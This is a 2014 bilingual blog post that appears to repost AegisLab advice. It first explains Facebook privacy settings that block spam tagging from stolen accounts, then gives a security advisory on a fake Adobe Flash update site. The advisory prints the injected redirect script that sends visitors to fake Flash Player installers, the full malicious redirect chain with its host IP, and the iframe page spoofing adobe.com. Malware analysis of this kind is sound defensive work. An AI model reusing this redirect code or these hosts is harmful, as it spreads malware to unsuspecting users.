首頁

2014年3月7日 星期五

*知識分享-"排除惡意之人的行為< -- "加強你的Facebook隱私設定 ,---> "讓你免於被惱人的購物社群標記~!!及及重要資訊*- *請小心擬真度百分之百且同步更新的假Adobe惡意網站!-- --安全通報2014-02-27~!*-USA(en)-* Knowledge Sharing - " to exclude malicious human behavior < - "Strengthening your Facebook privacy settings --- > "Let your shopping community from being annoying tag ~ ! ! And , And important information-* Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*!

*知識分享-"排除惡意之人的行為< -- "加強你的Facebook隱私設定 ,  
---> "讓你免於被惱人的購物社群標記~!!及及重要資訊*-   
*請小心擬真度百分之百且同步更新的假Adobe惡意網站!--   
--安全通報2014-02-27~!*-USA(en)-* Knowledge Sharing -   
" to exclude malicious human behavior < -  
 "Strengthening your Facebook privacy settings --- >  
 "Let your shopping community from being annoying tag ~ ! ! And , And important information-   
* Please be careful hundred percent degree of verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*! * 

*塗鴉牆上出現了不少標記人的購物粉絲團,
有鞋子、衣服、包包…等五花八門的商品,
這些商品照片上會有一個Line的ID

但是最討人厭的莫過於它標記了大量的人,
不斷的出現在你的Facebook塗鴉牆
仔細一看,可以發現這些照片上,
被標記的人都是由「同一個人」所標註(如下圖)*


















*Graffiti on the wall , there were many people shopping  
fan group labeled ,
There are shoes, clothes, bags ... and other sorts of goods,
These products have a Line of photo ID

But the most annoying than it marked a lot of people,
Constantly appear on your Facebook wall
A closer look , you can find these photos ,
People are marked by the " same person "   
marked ( see below)*  

*原來,是那個標註大家在相片裡的人帳號被盜了,
其帳號被駭客所竊取後,
即會將其朋友標記在那些購物粉絲團的照片中。

AegisLab在此提供幾個步驟的簡單設定教學,
讓大家免於受這些購物粉絲社群標記所擾!

 1). 首先,開啟你Facebook個人帳戶設定中--
--的「動態時報與標籤」,
我們來設定「誰可以在我的動態時報新增貼文?」--
--和「我該如何管理別人加上的標籤以及標籤建議?」這2個選項吧!  
*It turned out that labeling everyone who is in the photo where the account was stolen,
After his account was stolen by hackers ,
That will mark his friend in the photo in those shopping fan group .

AegisLab provides a simple set of teaching several steps in this ,
Let us immune to these shopping fan community marked by disturbed !

 1 ) First, open your Facebook personal account settings -
- The "Dynamic Times and labels "
We set "Who can add postings in my timeline ? " -
- And " How do I manage other people 's labels and tags plus suggestions ? " This two options it !  
*
*2). 設定「誰可以在我的動態時報新增貼文?」

​誰可以在你的動態時報上發佈文章?
可以設定是「朋友」或「只限本人」。

設定為「只限本人」,不怕被盜帳號的朋友在你的塗鴉牆上發文了!  
*2 ) Set "Who can add text posted on my timeline ? "

Who can publish articles on your timeline ?
You can set a " friend " or " Only I ."

Is set to " Only I ," not afraid of the stolen account your friends Posting a graffiti wall !   

*審查朋友們把你標註在內的貼文,
是否要顯示在你的動態時報?
可以設定為「啟用」或「關閉」。

設定為「啟用」,
這樣標註你的貼文都必需透過你的審核,
才會顯示在你的動態時報。*Review your friends , including marked Posts ,
Do you want to appear in your timeline ?
Can be set to "Enable " or "off ."

Set "Enable" is ,
Such labels are necessary for your postings through   
your audit ,
Will appear in your timeline .   
















*3). 設定「我該如何管理別人加上的標籤以及標籤建議?」

標籤出現在 Facebook 之前,
先檢查別人貼在你貼文中的標籤?
可以設定為「啟用」或「關閉」。

設定為「啟用」,
這樣當有人要標記你時,
都必須經過你的審查,才會被允許標記。*3 ) Set " How do I manage other people 's labels and tags plus suggestions ? "

Labels appear before Facebook,
Someone posted on your first check the label affixed   
to the text ?
Can be set to "Enable " or "off ."

Set "Enable" is ,
So that when someone wants to tag you,
You must go through the review , will be allowed tag.   
*
*當你被標註在貼文中時,
如果你要分享的朋友還沒在分享對象中,
你想加誰到分享名單?
可以設定為「朋友」、「只限本人」或「自訂」。

設定為「只限本人」,
這樣當你被標註在貼文時,
只有你自己會看到該貼文,
不會讓你的朋友們看到。  
*When you paste the text is marked in time ,
If you are not a friend to share in the sharing of objects ,
Do you want to add a list of who to share ?
Can be set to "Friends ," " Only I " or "Custom ."

Is set to " Only I "
So that when you paste the text is marked in time ,
Only you will see the postings ,
Do not let your friends see .    

*






*
在有看起來像你的相片被上傳後,
誰可以看到姓名標籤建議?
可以設定為「朋友」或「沒有人」。

設定為「沒有人」,
這樣當有與你相像的照片被上傳後,
便不會出現你的姓名標籤建議了。   
*There looks like in your photo is uploaded,
Who can see the name tag suggestions ?
Can be set to "friends" or " no one ."

Is set to " nobody "
So that when you have similar photos are uploaded ,
Your name will not appear label suggested .  
*











*只要照著以上這些步驟,
那些惱人的購物社群要標記你時,
都得經過你審核才行,
而你被標記的貼文也只有你會看到,
不會影響到你Facebook上的好友了!

以上只是加強自己本身的隱私設定,
還必須讓身邊的朋友也知道這些隱私設定的重要性,
才能減少Facebook塗鴉牆上那些惱人的廣告訊息。

這些隱私設定都只是「治標」,
良好的使用習慣和基本的資安意識才是「治本」喔!

如何知道自己對哪些專頁按過讚及如何取消?   
*Just follow these steps
Those annoying when you want to mark shopping community ,
You had to go through an audit job ,
And you paste text marked only you will see ,
Does not affect you, your friends on Facebook !

These are just strengthen its own privacy settings ,
You must also let her friends know the importance of these privacy settings,
Facebook Graffiti on the wall in order to reduce those   
annoying advertising messages .

These privacy settings are only " temporary "
Good habits and basic information security awareness   
is the " cure " Oh !

How do I know what special page on pressed praise and   
how to cancel ?    
*1). 點選「活動紀錄」   
*1 ) Tap "Activity History"   




*2). 點選「讚」、「專頁和興趣」    
*2 ) Tap "Like" , " Fan Page and interests ."    










*3).點選專頁右上方的編輯鈕,
即可「收回讚」或是檢舉對方 .   
*3 ) Tap the Edit button at the top right special page ,
To " recover Like" or spotted each other.    

------------------------------------------------------------------------
**再分享重要資訊--*請小心擬真度百分之百且同步更新的--
--假Adobe惡意網站!----安全通報2014-02-27~!*
AegisLab 近日發現了一個惡意網站:  hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/
_samples/api_dialog/js.html

我們可以看出此惡意的 js.html 是位於 cpanel 裡的 ckediter 目錄

cPanel為一個後台管理系統,讓你透過網頁方式管理你的網站

CKEditer為一個使用在網頁上的所見即所得文字編輯器

這2個元件的漏洞時有所聞:
*cPanel Security =  https://cpanel.net/category/security/

CKEditor 3.6.1 File Upload Vulnerability =  http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html

CKEditor 4.0.1 – Multiple Vulnerabilities =
  http://www.exploit-db.com/exploits/24530/


我們推測是這2個元件的問題, 
才讓駭客將惡意的 js.html 塞到該目錄下
*這個網站會先判斷你的瀏覽器類型和版本、  
作業系統、IP、Flash版本、AdobeReader版本等資訊,
再將你導至不同的 URL 下載一個假--
--的 Flash Player 安裝檔,
部份原始碼如下↓  *

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
if ("" == "Windows 8") {
        if ( cr == "sr" ) {
            window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe");
        } else if ( cr == "ils" ) {
            window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe");
        } else if ( cr == "ars" ) {
            window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe");
        } else if ( cr == "ila" ) {
            window.location.assign("http://adobeflashupdate1.com/download/install_flashplayer12.0.8.44.exe");
        } else {
            window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe");
        }
} else {
        if ("" == "IE") {
        //alert("An update to your Adobe Flash Player is available");
            if ( cr == "sr" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe");
            } else if ( cr == "ils" ) {
                window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe");
            } else if ( cr == "ars" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe");
            } else if ( cr == "ila" ) {
                window.location.assign("http://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe");
            } else {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe");
            }
        } else {
            //alert("An update to your Adobe Flash Player is available");
            if ( cr == "sr" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe");
            } else if ( cr == "ils" ) {
                window.location.assign("http://adobeflashupdates.com/download/Flash Player non IE 11.9.9.exe");
            } else if ( cr == "ars" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer non IE 11.9.exe");
            } else if ( cr == "ila" ) {
                window.location.assign("http://adobeflashupdate1.com/download/installflashplayer12.0.0.44.exe");
            } else {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe");
            }
        }
}

*AegisLab所測試的惡意流程:
hxxp://www.ajyadgroup.net/old/ajyad_cpanel/ckeditor/_samples/api_dialog/js.html
→ hxxp://142.0.79.184/agent/agent.php?cr=ila
→ hxxp://142.0.79.184/agent/agent_check.php?ip=114.44.216.107&cr=ila
→ hxxp://142.0.79.184/agent/agent_save.php?cr=ila&Browser_Type=IE&Browser_Version=6.0&OS=Windows+XP&OS_Version=&IP=114.44.216.107
&referer=&Flash=11,5,502,146&Shockwave=null&Silverlight=null&VLC=null&WindowsMediaPlayer=
9,0,0,3250&PDFReader=null&AdobeReader=9,5,0,0&DevalVR=null&QuickTime=null&RealPlayer=null
&IE_ActiveX=true
最後下載的假 Flash Player 安裝檔:  hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe    

















*(en)*
*cPanel is a backstage management system that   
allows you to manage your way through the web site

CKEditer use on a website WYSIWYG text editor

Vulnerability of these two elements often heard :

cPanel Security = https://cpanel.net/category/security/

CKEditor 3.6.1 File Upload Vulnerability = http://www.bugsearch.net/en/13642/ckeditor-361-file-upload-vulnerability.html

CKEditor 4.0.1 - Multiple Vulnerabilities =
 http://www.exploit-db.com/exploits/24530/


We speculate that these two elements are the problem , 
and will only let malicious hackers js.html stuffed   
into that directory

This site will first determine your browser type and version, operating system , IP, Flash version ,  
 AdobeReader information such as version ,
You then lead to a different URL to download a fake -
- The Flash Player installation file ,
Part of the source code below ↓

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
if ("" == "Windows 8") {
        if ( cr == "sr" ) {
            window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe");
        } else if ( cr == "ils" ) {
            window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe");
        } else if ( cr == "ars" ) {
            window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe");
        } else if ( cr == "ila" ) {
            window.location.assign("http://adobeflashupdate1.com/download/install_flashplayer12.0.8.44.exe");
        } else {
            window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe");
        }
} else {
        if ("" == "IE") {
        //alert("An update to your Adobe Flash Player is available");
            if ( cr == "sr" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe");
            } else if ( cr == "ils" ) {
                window.location.assign("http://adobeflashupdates.com/download/Flash Player IE 11.9.9.exe");
            } else if ( cr == "ars" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer IE 11.9.exe");
            } else if ( cr == "ila" ) {
                window.location.assign("http://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe");
            } else {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe");
            }
        } else {
            //alert("An update to your Adobe Flash Player is available");
            if ( cr == "sr" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.1.exe");
            } else if ( cr == "ils" ) {
                window.location.assign("http://adobeflashupdates.com/download/Flash Player non IE 11.9.9.exe");
            } else if ( cr == "ars" ) {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer non IE 11.9.exe");
            } else if ( cr == "ila" ) {
                window.location.assign("http://adobeflashupdate1.com/download/installflashplayer12.0.0.44.exe");
            } else {
                window.location.assign("http://adobeflashupdates.com/download/FlashPlayer11.9.exe");
            }
        }
}


*AegisLab tested malicious process:

hxxp :/ / www.ajyadgroup.net / old / ajyad_cpanel / ckeditor / _samples / api_dialog / js.html

→ hxxp :/ / 142.0.79.184/agent/agent.php? Cr = ila

→ hxxp :/ / 142.0.79.184/agent/agent_check.php? Ip = 114.44.216.107 & cr = ila

→ hxxp :/ / 142.0.79.184/agent/agent_save.php? Cr = ila & Browser_Type = IE & Browser_Version = 6.0 & OS = Windows + XP & OS_Version = & IP = 114.44.216.107

& referer = & Flash = 11,5,502,146 & Shockwave = null & Silverlight = null & VLC = null & WindowsMediaPlayer =

9,0,0,3250 & PDFReader = null & AdobeReader = 9,5,0,0 & DevalVR = null & QuickTime = null & RealPlayer = null

& IE_ActiveX = true

Finally, download the fake Flash Player installation file :  
  hxxp://adobeflashupdate1.com/download/instalflashplayer12.0.0.44_ie.exe    

























--------------------------------
*這個假的 Flash Player 為病毒,在virustotal的偵測率:(23/48) = 
= https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/   
有趣的是…``
最後下載的PE URL的host - 
adobeflashupdate1.com,
頁面看起來跟真的一模一樣,
這真的是 Adobe 官方的站嗎??!!@?     

*This fake Flash Player for the virus , the detection rate in virustotal : ( 23 /48 ) =
= Https://www.virustotal.com/en/file/a54cb6c8b5989c76a942ca9350a53d4c3c9068a647ec5bb697e16c12c1c83f50/analysis/
Interestingly ... `
Download the PE URL host the final -
adobeflashupdate1.com,
Page looks exactly the same with the real ,It
It's really is Adobe 's official stand it??!! @  
*#左上方的 Adobe 標誌連結也是連到 www.adobe.com ,
但看其網頁原始碼就發現真相了!   
1
2
3
4
5
6
7
8
9
<html>
<body>
 
<iframe src="http://www.adobe.com" width="100%" height="100%" frameBorder="0">
<p>Your browser does not support iframes.</p>
</iframe>
 
</body>
</html>
 原來,它在裡面嵌了一個 www.adobe.com 的 iframe 在裡面,所以看起來才會跟 Adobe 官網一模一樣
adobeflashupdate1.com 在virustotal的偵測率:(7/53)   
AegisLab WebGuard 已將 [D]adobeflashupdate1.com 加至rule中阻擋,提醒客戶隨時保持 WebGuard signature 的更新!     
-----------------------------
*en# Adobe logo at the top left link is also connected to www.adobe.com,
But looking at their page source discovered the truth !    

1
2
3
4
5
6
7
8
9
<html>
<body>
 
<iframe src="http://www.adobe.com" width="100%" height="100%" frameBorder="0">
<p>Your browser does not support iframes.</p>
</iframe>
 
</body>
</html>

*Originally, it is embedded inside a www.adobe.com of -
- Iframe inside,
So it looks exactly the same only with Adobe 's official website ! ! !

adobeflashupdate1.com in virustotal detection rate: (7/53) =
= Https://www.virustotal.com/en/url/3e8f7243be9d55d2182a6c5d26028f2721bb6ce7375c9eec37a45eff740df064/analysis/
AegisLab WebGuard has -
- [D] adobeflashupdate1.com    
-added to the rule in the block ,
Remind customers to stay in WebGuard signature updates !*   

**知識分享-"排除惡意之人的行為< -- "加強你的Facebook隱私設定 ,  
---> "讓你免於被惱人的購物社群標記~!!及 -重要資訊*請小心擬真度百分之百 -且同步更新的假Adobe惡意網站!-- --安全通報2014-02-27~!*  
-USA(en)-* Knowledge Sharing - " to exclude malicious human behavior < - "Strengthening your Facebook privacy settings   
--- > "Let your shopping community from being annoying tag ~ ! ! And , And important information-*Please be careful hundred percent degree of   verisimilitude and synchronized updates malicious fake Adobe website ! -- Security Advisory 2014-02-27~*!    
===Sincerely === THE END === Melody.Blogger~===>/

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&



沒有留言:

張貼留言


if you like make fds, wellcome you here~~anytime***

my free place for everyones who want the good software,

come & download them~ wellcome!!